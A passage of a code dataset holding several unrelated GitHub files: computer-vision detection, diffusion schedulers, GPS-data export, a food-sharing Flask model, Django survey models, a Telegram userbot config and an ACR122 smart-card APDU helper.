min:\n min = dis\n return min;\n\ndef get_pixel(H):\n points = get_pose_point_noroate(H)\n return average_pixel(points)\n\n","repo_name":"BlackJocker1995/Apriltag_python","sub_path":"tagUtils.py","file_name":"tagUtils.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"84"} +{"seq_id":"25699640904","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\napi_id = os.getenv('api_id')\napi_hash = os.getenv('api_hash')\n\ncommand_prefixes = ['.','!','/']\n\na = 0\n\nghoul_table_command = 'ghoul-c'\n\nend_message = 'l l let me die' # Сообщение после конца цикла, если не нужно - оставляем пустым\nmessages_per_second = 7 # Для ghoul_spam\nsleep_time_ghoul = 0.1 ","repo_name":"DragonsCode/userbot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1465156437","text":"import argparse\nimport os\nfrom os.path import isfile, join\nimport random\nimport tempfile\nimport time\nimport copy\nimport multiprocessing\nimport subprocess\nimport shutil\nimport cv2\n\n\nimport numpy as np\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\n\nfrom PIL import Image, ImageDraw\nimport torchvision\n\nfrom model import trtYOLO\nfrom utils.utils import draw_bboxes,calculate_padding\n\n\n\n\ndef load_label_categories(label_file_path):\n categories = [line.rstrip('\\n') for line in open(label_file_path)]\n return categories\n\nLABEL_FILE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'coco_labels.txt')\nALL_CATEGORIES = load_label_categories(LABEL_FILE_PATH)\n\ndef main(target_path,engine_file,cfg_file,cam_device = 0,vanilla_anchor = True,mode = 'image'):\n \n trt_model = trtYOLO(cfg_file,engine_file,vanilla_anchor=True)\n\n if target_path == None:\n mode = 'video'\n \n print(\"detect mode is:\",mode)\n if mode == 'image':\n detect_single_img(target_path,trt_model)\n elif mode == 'video':\n detect_video(trt_model,cam_device)\n else:\n print(\"target path error\")\n\ndef detect_single_img(target_path,trt_model):\n img = cv2.imread(target_path)\n (boxes,clss,clss_prob) = trt_model.detect_frame(img)\n for box,clss_i,cls_prob in zip(boxes,clss,clss_prob):\n print(ALL_CATEGORIES[clss_i],\" conf:\",cls_prob,box)\n img_with_boxes = draw_bboxes(img,boxes,clss,clss_prob,ALL_CATEGORIES)\n 
cv2.imwrite(target_path.split('/')[-1],img_with_boxes)\n\n\ndef detect_video(trt_model,cam_device = 0):\n    cap = cv2.VideoCapture(cam_device) # open the camera\n    cap.set(cv2.CAP_PROP_FRAME_WIDTH,1280)\n    cap.set(cv2.CAP_PROP_FRAME_HEIGHT,720)\n\n    while True:\n        print(\"-----------------------------\")\n        t_time1 = time.time()\n        return_value, frame = cap.read() \n        if return_value is False:\n            print(\"[error] failed to open camera!\")\n            exit()\n        t_time2 = time.time()\n        print(\"[Time]get frame time :\",(t_time2-t_time1))\n\n        # trt_model.detect_path('data/dog.jpg')\n        (boxes,clss,clss_prob) = trt_model.detect_frame(frame)\n        if boxes is None:\n            img_with_boxes = frame\n        else:\n            for box,clss_i,cls_prob in zip(boxes,clss,clss_prob):\n                print(ALL_CATEGORIES[clss_i],\" conf:\",cls_prob,box)\n            img_with_boxes = draw_bboxes(frame,boxes,clss,clss_prob,ALL_CATEGORIES)\n        cv2.imshow(\"img_with_boxes\",img_with_boxes)\n        t_time3 = time.time()\n        print(\"[Time]detect time:\",(t_time3-t_time2))\n        if cv2.waitKey(1) & 0xFF == ord('z'): # press 'z' to quit\n            break\n        \n        print(\"[Time]total time: \",(t_time3-t_time1))\n        #cv2.imshow(\"frame\",frame)\n        print(\"FPS: \",1./(t_time3- t_time1))\n    \n    cap.release() \n    cv2.destroyAllWindows() \n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    def add_bool_arg(name, default, help):\n        arg_group = parser.add_mutually_exclusive_group(required=False)\n        arg_group.add_argument('--' + name, dest=name, action='store_true', help=help)\n        arg_group.add_argument('--no_' + name, dest=name, action='store_false', help=(\"Do not \" + help))\n        parser.set_defaults(**{name:default})\n    parser.add_argument('--cfg_path', type=str, default='model_cfg/yolov3-608.cfg')\n    parser.add_argument('--target_path', type=str,default='data/dog.jpg', help='path to target image/video')\n    parser.add_argument('--engine_file',type=str,default='yolov3-608.trt',help='path to TensorRT engine file')\n    parser.add_argument('--mode',type=str,default='image',help='detect: image or video')\n    parser.add_argument('--camera_device',type=int,default=0,help='code of camera device')\n\n    add_bool_arg('vanilla_anchor', default=True)\n\n    opt = parser.parse_args()\n\n    main(cfg_file=opt.cfg_path,\n         target_path=opt.target_path,\n         engine_file=opt.engine_file,\n         cam_device=opt.camera_device,\n         mode=opt.mode,\n         vanilla_anchor = True)\n    ","repo_name":"sylarchen1389/tensorrt_yolov3","sub_path":"detecct.py","file_name":"detecct.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"73073823313","text":"\"\"\"Schedulers for Denoising Diffusion Probabilistic Models\"\"\"\n\nimport math\n\nimport numpy as np\nimport torch\n\nclass CategoricalDiffusion(object):\n    def __init__(self, T, schedule):\n        # Diffusion steps\n        self.T = T\n\n        # Noise schedule\n        if schedule == 'linear':\n            b0 = 1e-4\n            bT = 2e-2\n            self.beta = np.linspace(b0, bT, T)\n        elif schedule == 'cosine':\n            self.alphabar = self.__cos_noise(np.arange(0, T + 1, 1)) / self.__cos_noise(\n                0)  # Generate an extra alpha for bT\n            self.beta = np.clip(1 - (self.alphabar[1:] / self.alphabar[:-1]), None, 0.999)\n\n        beta = self.beta.reshape((-1, 1, 1))\n        eye = np.eye(2).reshape((1, 2, 2))\n        ones = np.ones((2, 2)).reshape((1, 2, 2))\n\n        self.Qs = (1 - beta) * eye + (beta / 2) * ones\n\n        Q_bar = [np.eye(2)]\n        for Q in self.Qs:\n            Q_bar.append(Q_bar[-1] @ Q)\n        self.Q_bar = np.stack(Q_bar, axis=0)\n\n    def __cos_noise(self, t):\n        offset = 0.008\n        return np.cos(math.pi * 0.5 * (t / self.T + offset) / (1 + offset)) ** 
2\n\n def sample(self, x0_onehot, t):\n # Select noise scales\n Q_bar = torch.from_numpy(self.Q_bar[t]).float().to(x0_onehot.device)\n xt = torch.matmul(x0_onehot, Q_bar.reshape((Q_bar.shape[0], 1, 2, 2)))\n return torch.bernoulli(xt[..., 1].clamp(0, 1))\n\n\nclass InferenceSchedule(object):\n def __init__(self, inference_schedule=\"linear\", T=1000, inference_T=1000):\n self.inference_schedule = inference_schedule\n self.T = T\n self.inference_T = inference_T\n\n def __call__(self, i):\n assert 0 <= i < self.inference_T\n\n if self.inference_schedule == \"linear\":\n t1 = self.T - int((float(i) / self.inference_T) * self.T)\n t1 = np.clip(t1, 1, self.T)\n\n t2 = self.T - int((float(i + 1) / self.inference_T) * self.T)\n t2 = np.clip(t2, 0, self.T - 1)\n return t1, t2\n elif self.inference_schedule == \"cosine\":\n t1 = self.T - int(\n np.sin((float(i) / self.inference_T) * np.pi / 2) * self.T)\n t1 = np.clip(t1, 1, self.T)\n\n t2 = self.T - int(\n np.sin((float(i + 1) / self.inference_T) * np.pi / 2) * self.T)\n t2 = np.clip(t2, 0, self.T - 1)\n return t1, t2\n else:\n raise ValueError(\"Unknown inference schedule: {}\".format(self.inference_schedule))\n","repo_name":"Thinklab-SJTU/T2TCO","sub_path":"diffusion/utils/diffusion_schedulers.py","file_name":"diffusion_schedulers.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"84"} +{"seq_id":"18527194282","text":"#!/usr/bin/env python3\n#\n# gpsdjson2xlsx -- format GPSD JSON satellite information\n# into human-readable Excel table\n#\n# Written by Tak Yanagida\n#\n# This file is licensed under CC0.\n# https://creativecommons.org/publicdomain/zero/1.0/\n\nimport sys\nimport argparse\nimport json\nimport xlsxwriter\n\nparser = argparse.ArgumentParser()\nparser.add_argument('input', type=argparse.FileType(), nargs='?', default=sys.stdin)\nparser.add_argument('output', nargs='?', default='out.xlsx')\nargs = parser.parse_args()\n\nworkbook = xlsxwriter.Workbook(args.output)\nworksheet = workbook.add_worksheet()\nused_style = workbook.add_format({'bg_color': '#80ff80'})\nnotused_style = workbook.add_format({'bg_color': 'gray'})\n\nmsgs = []\n\nfor line in args.input:\n msg = json.loads(line)\n msgs.append(msg)\n\nsatellites = set()\nfor msg in msgs:\n if (msg['class'] != \"SKY\"):\n continue\n for sat in msg['satellites']:\n satellites.add(sat['PRN'])\n\nfields = sorted(list(satellites))\nrow = 0\ncolumn = 0\nfor field in fields:\n worksheet.write(row, column, field)\n column += 1\n\nrow = 1\ncolumn = 0\nfor msg in msgs:\n snr = {}\n if (msg['class'] != \"SKY\"):\n continue\n for sat in msg['satellites']:\n column = fields.index(sat['PRN'])\n if (sat['used'] == True):\n worksheet.write(row, column, sat['ss'], used_style)\n elif (sat['used'] == False):\n worksheet.write(row, column, sat['ss'], notused_style)\n else:\n worksheet.write(row, column, sat['ss'])\n row += 1\n \nworkbook.close()\n","repo_name":"takyanagida/gpsdjson2xlsx","sub_path":"gpsdjson2xlsx.py","file_name":"gpsdjson2xlsx.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"32618353025","text":"import math\nfrom datetime import datetime\nfrom sqlalchemy.dialects.postgresql import array_agg\n\nfrom sqlalchemy.sql import func, desc\nfrom app import db\nfrom .tag import OffersTags\nfrom .sharer_rating import SharerRating\nfrom .user import User\n\n\nclass Offer(db.Model):\n __tablename__ = 
\"offer\"\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id')) # Many orders from one user\n name = db.Column('name', db.String(255),\n nullable=False)\n active = db.Column('active', db.Boolean, nullable=False)\n description = db.Column('description', db.Text, nullable=True)\n photo = db.Column('photo', db.String(255), nullable=True)\n portions_number = db.Column('portions_number', db.Integer, nullable=False)\n pickup_longitude = db.Column('pickup_longitude', db.Float, nullable=False)\n pickup_latitude = db.Column('pickup_latitude', db.Float, nullable=False)\n post_time = db.Column('post_time', db.DateTime, nullable=False, default=func.now)\n pickup_times = db.Column('pickup_times', db.String(255), nullable=False)\n offer_expiry = db.Column('offer_expiry', db.DateTime, nullable=False)\n\n orders = db.relationship('Orders', backref='offers_orders',\n foreign_keys='Orders.offer_id') # One offer to many Orders\n\n tags = db.relationship('OffersTags', back_populates='offer')\n\n chat_rooms = db.relationship('ChatRoom', backref='offer_chat_rooms',\n foreign_keys='ChatRoom.offer_id') # One offer to many Messages\n\n def to_dict(self):\n data = {\n 'id': self.id,\n 'user_id': self.user.id,\n 'user_name': self.user.name,\n 'user_surname': self.user.surname,\n 'user_rating': SharerRating.get_user_rating_aggregated(self.user.id),\n 'name': self.name,\n 'active': self.active,\n \"description\": self.description,\n \"photo\": self.photo,\n \"portions_number\": self.portions_number,\n \"used_portions\": sum([order.portions for order in self.orders if order.is_canceled == False]),\n \"pickup_latitude\": self.pickup_latitude,\n \"pickup_longitude\": self.pickup_longitude,\n \"post_time\": self.post_time,\n \"pickup_times\": self.pickup_times,\n \"offer_expiry\": self.offer_expiry,\n \"tags\": [offer_tag.tag.to_dict() for offer_tag in self.tags]\n }\n\n return data\n\n def to_search_dict(self):\n user_rating = SharerRating.get_user_rating_aggregated(self.user.id)\n data = {\n 'id': self.id,\n 'user_id': self.user.id,\n 'user_name': self.user.name,\n 'user_surname': self.user.surname,\n 'user_photo': self.user.profile_picture,\n 'user_rating': user_rating,\n 'name': self.name,\n 'active': self.active,\n \"description\": self.description,\n \"photo\": self.photo,\n \"portions_number\": self.portions_number,\n \"used_portions\": sum([order.portions for order in self.orders if order.is_canceled == False]),\n \"pickup_latitude\": self.pickup_latitude,\n \"pickup_longitude\": self.pickup_longitude,\n \"post_time\": self.post_time,\n \"pickup_times\": self.pickup_times,\n \"offer_expiry\": self.offer_expiry,\n \"tags\": [offer_tag.tag.tag_name for offer_tag in self.tags]\n }\n\n return data\n\n def to_chat_dict(self, user_id):\n user_rating = SharerRating.get_user_rating_aggregated(self.user.id)\n data = {\n \"is_my_offer\": self.user.id == user_id,\n 'id': self.id,\n 'user_id': self.user.id,\n 'user_username': self.user.username,\n 'user_name': self.user.name,\n 'user_surname': self.user.surname,\n 'user_photo': self.user.profile_picture,\n 'user_rating': user_rating,\n 'name': self.name,\n 'active': self.active,\n \"description\": self.description,\n \"photo\": self.photo,\n \"portions_number\": self.portions_number,\n \"used_portions\": sum([order.portions for order in self.orders if order.is_canceled == False]),\n \"pickup_latitude\": self.pickup_latitude,\n \"pickup_longitude\": self.pickup_longitude,\n \"post_time\": self.post_time,\n 
\"pickup_times\": self.pickup_times,\n \"offer_expiry\": self.offer_expiry,\n \"tags\": [offer_tag.tag.tag_name for offer_tag in self.tags]\n }\n\n return data\n\n\n @staticmethod\n def add_offer(user_id, name, active, portions_number, pickup_long, pickup_lat, post_time,\n pickup_times,\n offer_expiry, description=None, photo=None):\n offer = Offer(\n user_id=user_id,\n name=name,\n active=active,\n portions_number=portions_number,\n pickup_longitude=pickup_long,\n pickup_latitude=pickup_lat,\n post_time=post_time,\n pickup_times=pickup_times,\n offer_expiry=offer_expiry,\n description=description,\n photo=photo\n )\n db.session.add(offer)\n db.session.commit()\n return offer.id\n\n @staticmethod\n def update_offer(content, photo_url):\n offer = Offer.query.filter_by(id=content['id']).first()\n offer.name = content['name']\n offer.active = content['active']\n offer.portions_number = content['portions_number']\n offer.pickup_longitude = content['pickup_longitude']\n offer.pickup_latitude = content['pickup_latitude']\n offer.pickup_times = content['pickup_times']\n offer.offer_expiry = content['offer_expiry']\n offer.description = content['description']\n offer.photo = photo_url\n\n OffersTags.query.filter_by(offer_id=content['id']).delete()\n\n for tag in content.get('tags', []):\n OffersTags.add_offer_tag(content['id'], tag['tag_id'])\n db.session.commit()\n\n @staticmethod\n def get_all_offers():\n return Offer.query.all()\n\n @staticmethod\n def get_active_offers():\n return Offer.query.filter_by(active=True) \\\n .filter(Offer.offer_expiry >= datetime.now())\n\n @staticmethod\n def get_offer_by_id(offer_id):\n return Offer.query.filter_by(id=offer_id).first()\n\n @staticmethod\n def get_current_offers_of_user(user_id):\n return Offer.query.filter_by(user_id=user_id) \\\n .filter(Offer.active == True) \\\n .filter(Offer.offer_expiry >= datetime.now()) \\\n .order_by(desc(Offer.post_time))\n\n @staticmethod\n def get_all_active_offers_except_mine(user_id):\n return Offer.query.filter_by(active=True) \\\n .filter(Offer.user_id != user_id) \\\n .filter(Offer.offer_expiry >= datetime.now())\n\n @staticmethod\n def check_tags(offers, tags_ids):\n if tags_ids is None:\n return offers\n elif not tags_ids:\n return offers\n elif tags_ids is not None:\n return offers\\\n .join(OffersTags)\\\n .filter(OffersTags.tag_id.in_(tags_ids))\\\n .group_by(Offer.id)\n # .having(array_agg(OffersTags.tag_id).contains(tags_ids))\n\n\n @staticmethod\n def sort_by_distance_from_user(offers, user_lon, user_lat):\n return offers.order_by(\n (func.degrees(\n func.acos(\n func.sin(func.radians(user_lat)) * func.sin(func.radians(Offer.pickup_latitude)) +\n func.cos(func.radians(user_lat)) * func.cos(func.radians(Offer.pickup_latitude)) *\n func.cos(func.radians(user_lon-Offer.pickup_longitude))\n )\n ) * 60 * 1.1515 * 1.609344))\n\n @staticmethod\n def sort_by_owner_ranking(offers):\n return offers\\\n .join(User, Offer.user_id == User.id)\\\n .join(SharerRating, SharerRating.to_user_id == User.id)\\\n .group_by(SharerRating.to_user_id, Offer.id)\\\n .order_by(desc(func.avg(SharerRating.rating)))","repo_name":"jasiekg25/foodsharing","sub_path":"services/backend/app/api/models/offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"73033371155","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom lugar.models import Comunidad, Municipio, Departamento, Pais\nfrom 
geoposition.fields import GeopositionField\n\n# Create your models here.\nclass Entrevistado(models.Model):\n nombre = models.CharField(max_length=200)\n fecha_nacimiento = models.DateField()\n\n class Meta:\n verbose_name_plural = 'Entrevistados'\n\n def __unicode__(self):\n return self.nombre\n\nclass DuenoFinca(models.Model):\n nombre = models.CharField(max_length=200)\n fecha_nacimiento = models.DateField()\n\n class Meta:\n verbose_name_plural = 'Dueños Fincas'\n\n def __unicode__(self):\n return self.nombre\n \nclass Organizacion(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Organizaciones'\n\n def __unicode__(self):\n return self.nombre\n\nclass Recolector(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Recolector'\n\n def __unicode__(self):\n return self.nombre\n\nCHOICE_SEXO = (\n (1, 'Hombre'),\n (2, 'Mujer'),\n (3, 'Mancomunado'),\n )\n\n#1.1\nclass Encuesta(models.Model):\n fecha = models.DateField('Fecha de recolección de datos')\n recolector = models.ForeignKey(Recolector)\n nombre = models.ForeignKey(Entrevistado, verbose_name=u'Nombre de entrevistado/a')\n cedula = models.CharField(max_length=50)\n dueno = models.ForeignKey(DuenoFinca, verbose_name='Dueño de la finca')\n sexo = models.IntegerField('Sexo del dueño de la finca', choices=CHOICE_SEXO)\n finca = models.CharField('Nombre de la finca', max_length=200, \n null=True, blank=True)\n pais = models.ForeignKey(Pais)\n departamento = models.ForeignKey(Departamento)\n municipio = models.ForeignKey(Municipio)\n comunidad = models.ForeignKey(Comunidad)\n position = position = GeopositionField(null=True, blank=True)\n altitud = models.IntegerField('altitud promedio',null=True, blank=True)\n beneficiarios = models.ManyToManyField(Organizacion, null=True, blank=True)\n\n\n class Meta:\n verbose_name_plural = '1.1 Información general '\n\n def __unicode__(self):\n return self.nombre.nombre\n#1.2\nclass SocioOrganizacion(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = \"Socios organizaciones\"\n\n def __unicode__(self):\n return self.nombre\n\nCHOICE_DESDE = (\n (1, 'Menos de 5 años'),\n (2, 'Más de 5 años'),\n (3, 'Ninguno'),\n )\n\nclass Beneficios(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Beneficio'\n verbose_name_plural = 'Beneficios'\n\n def __unicode__(self):\n return self.nombre\n\nclass CreditoE(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'credito'\n verbose_name_plural = 'creditos'\n\n def __unicode__(self):\n return self.nombre\n\nclass DeQuien(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Organizaciones que dan credito'\n verbose_name_plural = 'Organizaciones que dan creditos'\n\n def __unicode__(self):\n return self.nombre\n \nclass QuienFinancia(models.Model):\n socio = models.ManyToManyField(SocioOrganizacion, related_name=\"socios\")\n desde = models.IntegerField(choices=CHOICE_DESDE, null=True, blank=True)\n beneficio_ser_socio = models.ManyToManyField(Beneficios, \n related_name=\"beneficiario_socio\",\n null=True, blank=True)\n tiene_credito = models.ManyToManyField(CreditoE, \n related_name=\"credito\",\n null=True, blank=True)\n de_quien = models.ManyToManyField(DeQuien, related_name=\"quien\",\n null=True, blank=True)\n\n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n verbose_name_plural = '1.2 
Organización'\n\n def __unicode__(self):\n return \n \n#1.3\nclass ViveFamilia(models.Model):\n nombre = models.CharField(max_length=200)\n class Meta:\n \n verbose_name_plural = 'Vive Familias'\n\n def __unicode__(self):\n return self.nombre\n\nCHOICE_EDUCACION = (\n (1, 'NSLE'),\n (2, 'PRIn'),\n (3, 'PRC'),\n (4, 'SECIN'),\n (5, 'Bach'),\n (6, 'Univ'),\n )\n\nclass Composicion(models.Model):\n adultos = models.IntegerField('adultos varones', null=True, blank=True)\n adultas = models.IntegerField('adultas mujeres', null=True, blank=True)\n jovenes_varones = models.IntegerField(null=True, blank=True)\n jovenes_mujeres = models.IntegerField(null=True, blank=True)\n ninos = models.IntegerField('niños', null=True, blank=True)\n ninas = models.IntegerField('niñas', null=True, blank=True)\n permanente_hombres = models.IntegerField(null=True, blank=True)\n permanente_mujeres = models.IntegerField(null=True, blank=True)\n temporales_hombres = models.IntegerField(null=True, blank=True)\n temporales_mujeres = models.IntegerField(null=True, blank=True)\n tecnico_hombres = models.IntegerField(null=True, blank=True)\n tecnico_mujeres = models.IntegerField(null=True, blank=True)\n relacion_finca_vivienda = models.ForeignKey(ViveFamilia,null=True, blank=True)\n educacion_dueno = models.IntegerField('Nivel de educación de dueño de la finca?', \n choices=CHOICE_EDUCACION,null=True, blank=True)\n educacion_maxima_hombre = models.IntegerField('Nivel máximo de hombres de la finca?',\n choices=CHOICE_EDUCACION,null=True, blank=True)\n educacion_maxima_mujeres = models.IntegerField('Nivel máximo de las mujeres de la finca?',\n choices=CHOICE_EDUCACION,null=True, blank=True)\n\n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n \n verbose_name_plural = '1.3 Composición del grupo familiar'\n\n def __unicode__(self):\n return self.encuesta.nombre.nombre\n\n#1.4\nclass EnergiaFinca(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'EnergiaFinca'\n verbose_name_plural = 'EnergiaFincas'\n\n def __unicode__(self):\n return self.nombre\n\nclass Combustible(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Combustible en la cocina'\n verbose_name_plural = 'Combustibles en la cocina'\n\n def __unicode__(self):\n return self.nombre\n\nclass AguaFinca(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name = 'Disponibilidad de agua en la finca'\n verbose_name_plural = 'Disponibilidad de agua en la fincas'\n\n def __unicode__(self):\n return self.nombre\n \nclass ServiciosBasicos(models.Model):\n electricidad = models.ManyToManyField(EnergiaFinca, related_name=\"electricidad\",\n null=True, blank=True)\n combustible = models.ManyToManyField(Combustible, related_name=\"combustible\",\n null=True, blank=True)\n agua_trabajo_finca = models.ManyToManyField(AguaFinca, related_name=\"trabaja\",\n null=True, blank=True)\n agua_consumo_humano = models.ManyToManyField(AguaFinca, related_name=\"consumo\",\n null=True, blank=True)\n\n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n verbose_name_plural = '1.4 Servicios básicos en la finca'\n\n def __unicode__(self):\n pass\n \n#1.5\nCHOICE_PARCELA = (\n (1, 'Propia con escritura pública'),\n (2, 'Propias con Promesa de venta'),\n (3, 'Arrendada'),\n (4, 'Propia por herencia'),\n (5, 'Propias con título de reforma agraria'),\n (6, 'Parcela en tierra comunitaria'),\n (7, 'Sin documento'),\n )\nCHOICE_DOCUMENTO = (\n (1, 'Hombre'),\n (2, 'Mujer'),\n (3, 
'Mancomunado'),\n (4, 'Parientes'),\n (5, 'Colectivo'),\n (6, 'No hay'),\n )\n\nclass Tenecia(models.Model):\n tipo = models.IntegerField('Tipo de tenencia de parcela', choices=CHOICE_PARCELA)\n documento = models.IntegerField('Documento legal de la parcela, a nombre de quién', \n choices=CHOICE_DOCUMENTO)\n\n encuesta = models.ForeignKey(Encuesta)\n \n class Meta:\n verbose_name_plural = '1.5 Tenencia de la tierras'\n\n def __unicode__(self):\n pass\n \n\n#1.6\nCHOICE_ALIMENTOS_COMPRA = (\n (1, 'Todo'),\n (2, 'Más de la Mitad'),\n (3, 'Menos de la Mitad'),\n (4, 'Nada '),\n \n )\n\nCHOICE_SI_NO = (\n (1, 'Si'),\n (2, 'No'),\n \n )\n\nclass NecesidadAlimento(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Necesidad Alimentos'\n\n def __unicode__(self):\n return self.nombre\n \nclass Meses(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Meses del año'\n\n def __unicode__(self):\n return self.nombre\n\nclass TiemposCrisis(models.Model):\n nombre = models.CharField(max_length=200)\n\n class Meta:\n verbose_name_plural = 'Tiempo de crisis'\n\n def __unicode__(self):\n return self.nombre\n \nclass Seguridad(models.Model):\n compra_alimento = models.IntegerField('¿Qué parte de alimentos básicos que consume la familia o la en la finca se compra?',\n choices=CHOICE_ALIMENTOS_COMPRA,null=True, blank=True)\n cubrir_necesidades = models.IntegerField('¿Siente que en algunos años no ha podido cubrir las necesidades básicas de alimentación de la familia o la finca? ',\n choices=CHOICE_SI_NO,null=True, blank=True)\n porque_no_cubre = models.ManyToManyField(NecesidadAlimento,related_name=\"cubre\",\n verbose_name=u'¿Porque motivo no se ha podido cubrir las necesidades de alimentos de la familia o la finca?',\n null=True, blank=True)\n meses_dificiles = models.ManyToManyField(Meses, related_name=\"dificiles\",\n verbose_name=u'¿Cuáles son los meses más difíciles para la alimentación de la familia o la finca?',\n null=True, blank=True)\n soluciones_crisis = models.ManyToManyField(TiemposCrisis, related_name=\"crisis\",\n verbose_name=u'¿Qué soluciones y practicas implementa en los tiempos de crisis o escasez de alimentos?',\n null=True, blank=True)\n \n encuesta = models.ForeignKey(Encuesta)\n\n class Meta:\n \n verbose_name_plural = '1.6 Seguridad alimentaria de la familia'\n\n def __unicode__(self):\n pass\n","repo_name":"CARocha/estudiocafe","sub_path":"encuesta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11164,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"35393499667","text":"#!/usr/bin/python2.6\nfrom apdu.apduExecuter import *\nfrom arg.args import *\nfrom arg.argchecker import *\nfrom arg.resultHandler import *\n\nfrom addons.iso7816_4 import iso7816_4APDUBuilder\nfrom apdu.apdu import ApduDefault\nfrom apdu.exception import apduBuilderException\nfrom smartcard.sw.SWExceptions import CheckingErrorException\n\n\nacr122SW = {\n 0x61:(None, \n {0x00: \"Sucess !!!\",\n None: \"Bytes available : \"}),\n 0x63:(CheckingErrorException, \n {0x00: \"Operation failed\",\n 0x01: \"Timeout Error : the card does not answer\",\n 0x27: \"The checksum of the Contactless Response is wrong\",\n 0x7F: \"The PN532_Contactless Command is wrong.\"})\n}\n#TODO load somewhere\n\nclass acr122SamAPDUBuilder(iso7816_4APDUBuilder):\n \n @staticmethod \n def directTransmit(args):\n \"acr122 transmit data to pn532\"\n \n if len(args) < 1 
or len(args) > 255:\n raise apduBuilderException(\"invalid args size, must be a list of 1 to 255 items, got \"+str(len(args)))\n \n return ApduDefault(cla=0xFF,ins=0x00,p1=0x00,p2=0x00,data=args)\n \n @staticmethod\n def getResponse(Length):\n \"acr122 get response from pn532\"\n \n if Length < 1 or Length > 255:\n raise apduBuilderException(\"invalid argument Length, must be a value between 1 and 255, got \"+str(Length))\n \n return ApduDefault(cla=0xFF,ins=0xC0,p1=0x00,p2=0x00,expected_answer=Length)\n \n LinkToBuzzerOff = 0x00\n LinkToBuzzerDuringT1 = 0x01\n LinkToBuzzerDuringT2 = 0x02\n LinkToBuzzerDuringT1AndT2 = 0x03\n \n @staticmethod\n def ledAndBuzzerControl(initialRed,initialGreen,finalRed,finalGreen,T1Duration,T2Duration,Repetition,LinkToBuzzer):\n \"acr122 manage led and buzzer\"\n \n # P2 packs the LED control: state bits (0x01/0x02 final red/green, 0x10/0x20 initial red/green)\n # plus the matching update-mask bits (0x04/0x08 and 0x40/0x80); None leaves that LED untouched.\n P2 = 0\n \n if finalRed is not None:\n if finalRed:\n P2 |= 0x01\n P2 |= 0x04\n \n if finalGreen is not None:\n if finalGreen:\n P2 |= 0x02\n P2 |= 0x08\n \n if initialRed is not None:\n if initialRed:\n P2 |= 0x10\n P2 |= 0x40\n \n if initialGreen is not None:\n if initialGreen:\n P2 |= 0x20\n P2 |= 0x80\n \n if T1Duration < 1 or T1Duration > 255:\n raise apduBuilderException(\"invalid argument T1Duration, must be a value between 1 and 255, got \"+str(T1Duration))\n \n if T2Duration < 1 or T2Duration > 255:\n raise apduBuilderException(\"invalid argument T2Duration, must be a value between 1 and 255, got \"+str(T2Duration))\n \n if Repetition < 1 or Repetition > 255:\n raise apduBuilderException(\"invalid argument Repetition, must be a value between 1 and 255, got \"+str(Repetition))\n \n if LinkToBuzzer < 0 or LinkToBuzzer > 3:\n raise apduBuilderException(\"invalid argument LinkToBuzzer, must be a value between 0 and 3, got \"+str(LinkToBuzzer))\n \n return ApduDefault(cla=0xFF,ins=0x00,p1=0x40,p2=P2,data=[T1Duration,T2Duration,Repetition,LinkToBuzzer])\n \n @staticmethod\n def getFirmwareVersion():\n \"acr122 firmware version\"\n return ApduDefault(cla=0xFF,ins=0x00,p1=0x48,p2=0x01)\n \ndef acr122execute(envi,args):\n apdu = acr122SamAPDUBuilder.directTransmit(args)\n \n apduAnswer = executeAPDU(apdu)\n \n # SW1 0x61 means more response bytes are available from the PN532; fetch them.\n if apduAnswer.sw1 == 0x61:\n apdu = acr122SamAPDUBuilder.getResponse(apduAnswer.sw2)\n return executeAPDU(envi,apdu)\n else:\n pass #TODO\n \ni = IntegerArgChecker(1,255)\n\nExecuter.addCommand(CommandStrings=[\"acr122\",\"firmware\"], preProcess=acr122SamAPDUBuilder.getFirmwareVersion ,process=executeAPDU, postProcess=resultHandlerAPDUAndConvertDataAndSWToString)\nExecuter.addCommand(CommandStrings=[\"acr122\",\"transmit\"], preProcess=acr122SamAPDUBuilder.directTransmit ,process=executeAPDU, argChecker=AllTheSameChecker(hexaArgChecker(),\"args\"))\nExecuter.addCommand(CommandStrings=[\"acr122\",\"response\"], 